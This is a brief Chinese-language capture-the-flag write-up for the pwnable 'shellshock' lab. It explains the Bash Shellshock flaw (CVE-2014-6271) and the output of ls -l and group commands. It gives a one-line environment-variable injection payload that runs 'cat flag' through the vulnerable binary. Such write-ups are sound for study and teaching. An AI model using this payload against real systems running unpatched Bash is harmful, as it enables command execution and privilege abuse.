pwnable shellshock wp

查看当前用户:whoami

groups 查看当前登录用户的组内成员

groups test 查看test用户所在的组,以及组内成员

考察知识点 CVE-2014-6271(破壳漏洞)

GNU Bash 4.3及之前版本在评估某些构造的环境变量时存在安全漏洞,向环境变量值内的函数定义后添加多余的字符串会触发此漏洞,攻击者可利用此漏洞改变或绕过环境限制,以执行Shell命令。某些服务和应用允许未经身份验证的远程攻击者提供环境变量以利用此漏洞。此漏洞源于在调用Bash Shell之前可以用构造的值创建环境变量。这些变量可以包含代码,在Shell被调用后会被立即执行。

https://blog.csdn.net/tinyletero/article/details/40261593

 

http://www.cnblogs.com/snake-hand/p/3161511.html

 

env x='() { :;}; bash -c "cat flag" ' ./shellshock

 

pwnable shellshock wp_第1张图片

第一列:drwxr-xr-x,d代表目录,-代表普通文件。开始3个字符rwx代表该文件的属主的权限,中间3个字符r-x代表该文件属主所在用户组的其他用户的权限,最后r-x代表其他用户的权限。(r-read w-write x-excute)

第二列:若是文件则代表该文件的硬链接数。若是目录,则代表该目录下的子目录数,其实default-host目录下并没有子目录,为什么会显示有2个子目录呢,因为任何目录都有2个子目录,当前目录(.)和子目录(..)。

第三列:当前文件所属的用户名,若该用户被删除,则会显示该用户删除前的用户id。

第四列:当前文件所属的用户组。

第五列:若是文件则代表该文件的大小,若是目录则代表该目录的大小(不包括目录下的子目录和文件的大小)。

第六列:该文件最近修改或者查看的时间。

第七列:文件名称。

最前面没有被截屏的total 980 表示一共大小为980k

 

运行./shellshock可以暂时提升用户组权限来打开flag(详见文章开头第二个链接)

 

你可能感兴趣的:(pwnable shellshock wp)